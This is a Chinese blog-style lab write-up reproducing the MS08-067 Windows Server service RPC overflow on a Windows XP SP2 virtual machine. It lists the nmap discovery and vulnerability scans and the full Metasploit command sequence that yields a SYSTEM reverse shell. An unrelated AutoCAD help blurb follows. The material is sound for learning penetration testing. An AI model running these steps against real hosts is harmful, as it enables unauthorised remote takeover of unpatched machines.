Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)

一、漏洞详情

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。

二、靶机搭建

kali

在这里插入图片描述

Windows XP SP2 (Simplified Chinese )

下载平台:

https://next.itellyou.cn/Original/

在这里插入图片描述

下载链接:

ed2k://|file|sc_winxp_pro_with_sp2.iso|629227520|505B810E128351482AF8B83AC4D04FD2|/

在这里插入图片描述

(1)、配置IP:在这里插入图片描述

(2)、关闭防火墙:
在这里插入图片描述

三、利用nmap对靶机扫描

(1)、利用nmap探测主机存活:

注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101

nmap -sP -T4 172.16.12.0/24

在这里插入图片描述

(2)、利用nmap自带脚本对目标IP扫描:

nmap -sT -A --script=vuln -P0 172.16.12.101

注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,且目标靶机445端口开放,但是我们现在只考虑ms08-067。

在这里插入图片描述

四、漏洞利用

(1)、搜索 MS08_067漏洞:

search ms08

在这里插入图片描述

(2)、选择MS08_067漏洞:

use  0

在这里插入图片描述

(3)、查看MS08_067漏洞的payloads:

show payloads

在这里插入图片描述

(4)、选择42号payload:

set  payload 42

在这里插入图片描述

(5)、查看MS08_067漏洞所适用的Windows版本:

show targets

在这里插入图片描述

(6)、设置对应的目标靶机Windows版本:

set target  10

在这里插入图片描述

(7)、查看payload的详细信息:

show options

在这里插入图片描述

(8)、配置靶机ip,靶机开放端口,反向连接地址为攻击机ip,设置攻击机监听tcp端口号:
注:通过nmap得知靶机开放端口为445,所以默认设置。反向连接地址为攻击机ip,攻击机监听tcp端口号默认设置

set rhosts  172.16.12.101

在这里插入图片描述

(9)、初始化攻击环境,并开始对目标靶机进行攻击:

exploit 

在这里插入图片描述

(10)、进入目标系统的互交命令行shll中:

shell

在这里插入图片描述

(1)、用ipconfig验证:

ipconfig

在这里插入图片描述

五、总结

写到这里,这篇文章就介绍结束了,通过本次实验我们复现了MS08-067远程代码执行漏洞,涉及漏洞发现、验证漏洞、利用漏洞的完整过程,并利用Metasploit工具进行shell反弹及深入理解.
这也是我初入渗透测试的第一次漏洞复现,以后再接再厉,祝大家学而不缀!

  • 1
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
“autocad_2016_offline_help_simplified_chinese_win_32_64bit” 是指 AutoCAD 2016 的离线帮助文件,适用于简体中文的 Windows 32位和64位系统。 AutoCAD 是一款由 Autodesk 公司开发的专业计算机辅助设计(CAD)软件,被广泛应用于建筑、机械、电子等领域,用于绘制、编辑和分析二维和三维图形。离线帮助文件则是为了方便用户在没有网络连接的情况下,进行软件功能的查看和学习而提供的资料。 离线帮助文件通常包含软件的详细说明、操作指南、技巧和教程等内容,能够帮助用户了解软件的各种功能和使用方法。对于初学者来说,离线帮助文件更可以作为快速入门和问题解答的参考。同时,离线帮助文件也能够提供大量的示例和案例,供用户参考和借鉴。 “autocad_2016_offline_help_simplified_chinese_win_32_64bit” 这个离线帮助文件,针对中文用户进行优化,支持简体中文界面和操作指南,使得用户能够更加方便快速地获取软件的相关信息和技巧。 对于使用 AutoCAD 2016 的用户而言,下载并安装这个离线帮助文件可以为他们提供更加便捷的学习和使用 AutoCAD 的方式,无论是在办公室还是在无网络连接的环境中。使用这个离线帮助文件,用户可以在需要时随时查阅相关功能的说明和操作步骤,提升工作效率,减少出错的可能性。 总之,“autocad_2016_offline_help_simplified_chinese_win_32_64bit” 是一份专为 AutoCAD 2016 用户提供的中文离线帮助文件,使他们能够更好地了解和使用 AutoCAD,并在不同的工作场景中提高设计效率和质量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值